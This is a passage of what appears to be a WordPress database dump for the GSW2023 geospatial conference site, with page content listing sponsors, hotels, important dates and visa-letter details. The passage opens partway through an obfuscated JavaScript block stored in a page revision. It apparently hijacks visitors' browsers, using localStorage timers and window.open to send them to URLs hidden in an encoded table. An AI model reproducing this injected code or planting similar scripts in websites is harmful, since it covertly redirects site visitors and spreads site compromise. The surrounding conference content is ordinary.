_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 01:38:52','2023-06-24 01:38:52','',3066,'https://gsw2023.com/?p=4800',0,'revision','',0),
(4801,1,'2023-06-24 01:39:13','2023-06-24 01:39:13','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570680834{margin-top: 8px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser 